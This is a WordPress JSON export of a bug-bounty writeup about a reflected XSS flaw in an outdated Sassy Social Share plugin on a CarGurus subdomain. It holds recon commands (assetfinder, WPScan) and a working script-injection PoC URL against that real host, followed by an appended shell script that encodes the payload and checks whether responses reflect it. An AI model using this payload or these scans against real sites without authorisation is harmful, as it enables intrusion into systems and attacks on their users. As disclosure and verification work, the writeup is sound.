{"id":204,"date":"2023-08-19T22:01:00","date_gmt":"2023-08-19T15:01:00","guid":{"rendered":"https:\/\/n45ht.or.id\/blog\/?p=204"},"modified":"2025-01-16T00:06:47","modified_gmt":"2025-01-15T17:06:47","slug":"finding-wordpress-vulnerabilities-on-cargurus-with-wpscan","status":"publish","type":"post","link":"https:\/\/n45ht.or.id\/blog\/finding-wordpress-vulnerabilities-on-cargurus-with-wpscan\/","title":{"rendered":"Finding WordPress Vulnerabilities on CarGurus with WPScan"},"content":{"rendered":"\n<p>While exploring CarGurus&#8217; bug bounty program, I discovered a <strong>reflected XSS vulnerability<\/strong> on their subdomain <code>dealercentre.cargurus.co.uk<\/code>. This writeup details the steps I took to identify and exploit the vulnerability using WordPress enumeration tools and a known vulnerable plugin.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Subdomain Enumeration<\/h4>\n\n\n\n<p>CarGurus&#8217; bug bounty program accepts reports for subdomains of <code>cargurus.co.uk<\/code>. 
To begin my reconnaissance, I used <strong>Assetfinder<\/strong> to enumerate subdomains.<\/p>\n\n\n\n<p>Command:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"assetfinder --subs-only cargurus.co.uk\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">assetfinder<\/span><span 
style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">--subs-only<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">cargurus.co.uk<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Result:<br>I identified the subdomain <code>dealercentre.cargurus.co.uk<\/code>, which was running WordPress.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Scanning for WordPress Vulnerabilities<\/h4>\n\n\n\n<p>To identify potential vulnerabilities, I used <strong>WPScan<\/strong>, a popular WordPress security scanner.<\/p>\n\n\n\n<p>Command:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"wpscan --url https:\/\/dealercentre.cargurus.co.uk\/ --enumerate vp,vt --api-token [token]\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 
9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">wpscan<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">--url<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">https:\/\/dealercentre.cargurus.co.uk\/<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">--enumerate<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">vp,vt<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">--api-token<\/span><span style=\"color: #D8DEE9FF\"> [token]<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>--enumerate vp,vt<\/code>:\n<ul class=\"wp-block-list\">\n<li><code>vp<\/code>: Enumerate vulnerable plugins.<\/li>\n\n\n\n<li><code>vt<\/code>: Enumerate vulnerable themes.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">Discovery of Vulnerable Plugin<\/h4>\n\n\n\n<p>WPScan revealed that the website was using an <strong>outdated version of the Sassy Social Share plugin<\/strong>, which is known to be vulnerable to Reflected Cross-Site Scripting (XSS).<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>WPScan Reference:<br><a href=\"https:\/\/wpscan.com\/vulnerability\/99f4fb32-e312-4059-adaf-f4cbaa92d4fa\/\">https:\/\/wpscan.com\/vulnerability\/99f4fb32-e312-4059-adaf-f4cbaa92d4fa\/<\/a><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"790\" height=\"344\" 
src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/cargurus-bbp.png\" alt=\"\" class=\"wp-image-205\" style=\"width:504px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/cargurus-bbp.png 790w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/cargurus-bbp-300x131.png 300w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/cargurus-bbp-768x334.png 768w\" sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Exploiting the Vulnerability<\/h3>\n\n\n\n<p>Using the Proof of Concept (PoC) provided on WPScan, I tested the reflected XSS on the following URL:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">https:\/\/dealercentre.cargurus.co.uk\/blog\/april-2023-uk-vehicle-availability-index\/?a&quot;&gt;&lt;script&gt;alert(1)&lt;\/script&gt;<\/code><\/pre>\n\n\n\n<p>When this URL is opened in a browser, the payload executes and an alert box appears. The PoC is a classic attribute break-out: the page echoes the request URL, query string included, into a double-quoted HTML attribute without escaping it, so the leading <code>&quot;&gt;<\/code> closes that attribute and its tag, and the browser parses the injected <code>&lt;script&gt;<\/code> element as markup. A browser percent-encodes the quote and angle brackets on its own; when reproducing with a command-line client, encode them explicitly so the query string reaches the server unchanged, and check whether the response body contains the payload verbatim (vulnerable) or HTML-entity-encoded (patched) rather than relying on the alert alone.<\/p>\n\n\n\n<p>#HappyHacking<\/p>\n","protected":false},"excerpt":{"rendered":"<p>While exploring CarGurus&#8217; bug bounty program, I discovered a reflected XSS vulnerability on their subdomain dealercentre.cargurus.co.uk. This writeup details the steps I took to identify and exploit the vulnerability using WordPress enumeration tools and a known vulnerable plugin. Subdomain Enumeration CarGurus&#8217; bug bounty program accepts reports for subdomains of cargurus.co.uk. To begin my reconnaissance, I [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":206,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[23,9,8],"class_list":["post-204","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research","tag-bug-bounty","tag-cross-site-scripting","tag-xss"],"_links":{"self":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/204","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/comments?post=204"}],"version-history":[{"count":2,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/204\/revisions"}],"predecessor-version":[{"id":242,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/204\/revisions\/242"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media\/206"}],"wp:attachment":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media?parent=204"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/categories?post=204"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/tags?post=204"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
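The two verification steps the writeup glosses over, confirming that a discovered host is WordPress and confirming that the PoC is reflected unescaped rather than just trusting an alert box, are worked through below as an added shell example. It is not code from the original post or from WPScan. The functions `looks_like_wordpress`, `urlencode`, `reflection_verdict` and `poc_url` are this example's own; the `example.invalid` host, the `share-btn` class and the two HTML snippets are constructed stand-ins for an unpatched and a patched response, and the payload and target URL are the ones quoted in the post.

```shell
#!/bin/sh
# Added example (not part of the original post). Hostnames, HTML snippets
# and class names below are constructed for illustration.

# Fingerprint WordPress from a fetched HTML body using the paths and the
# generator meta tag that a stock WordPress install leaks in its front page.
looks_like_wordpress() {
  case "$1" in
    *'/wp-content/'*|*'/wp-includes/'*|*'/wp-json/'*|*'content="WordPress'*) return 0 ;;
  esac
  return 1
}

# Percent-encode an ASCII query-string payload so that curl sends the same
# bytes a browser would; quotes and angle brackets are otherwise easy to mangle.
urlencode() {
  s=$1 out=
  while [ -n "$s" ]; do
    rest=${s#?}            # everything after the first character
    c=${s%"$rest"}         # the first character itself
    case "$c" in
      [A-Za-z0-9.~_-]) out="$out$c" ;;                      # RFC 3986 unreserved
      *) out="$out$(printf '%%%02X' "'$c")" ;;             # %XX for everything else
    esac
    s=$rest
  done
  printf '%s' "$out"
}

# Classify how a response body reflects the payload: verbatim (vulnerable),
# HTML-entity-escaped (what a patched plugin should emit), or not at all.
reflection_verdict() {
  body=$1 payload=$2
  escaped=$(printf '%s' "$payload" | sed 's/&/\&amp;/g; s/"/\&quot;/g; s/</\&lt;/g; s/>/\&gt;/g')
  case "$body" in
    *"$payload"*) echo vulnerable ;;
    *"$escaped"*) echo escaped ;;
    *) echo not-reflected ;;
  esac
}

# Payload and target exactly as quoted in the writeup.
PAYLOAD='a"><script>alert(1)</script>'
TARGET='https://dealercentre.cargurus.co.uk/blog/april-2023-uk-vehicle-availability-index/'

# Build the PoC URL with the payload encoded. Fetching it needs network access
# and authorisation from the programme; the curl line is shown, not executed.
poc_url() { printf '%s?%s' "$TARGET" "$(urlencode "$PAYLOAD")"; }
# curl -s "$(poc_url)" -o body.html && reflection_verdict "$(cat body.html)" "$PAYLOAD"

# Constructed responses standing in for an unpatched and a patched site.
VULN_BODY='<a class="share-btn" data-url="https://example.invalid/post/?a"><script>alert(1)</script>">Share</a>'
FIXED_BODY='<a class="share-btn" data-url="https://example.invalid/post/?a&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">Share</a>'

# Stand-alone run: print the encoded PoC URL and the verdict for each sample.
poc_url; echo
reflection_verdict "$VULN_BODY" "$PAYLOAD"
reflection_verdict "$FIXED_BODY" "$PAYLOAD"
```

`reflection_verdict` is what turns "an alert appeared" into evidence a triager can check: a patched build reflects the same URL but with the quote and angle brackets entity-encoded, so the verdict flips from `vulnerable` to `escaped` without any change to the request. The encoder handles ASCII payloads only, which is all a PoC like this needs.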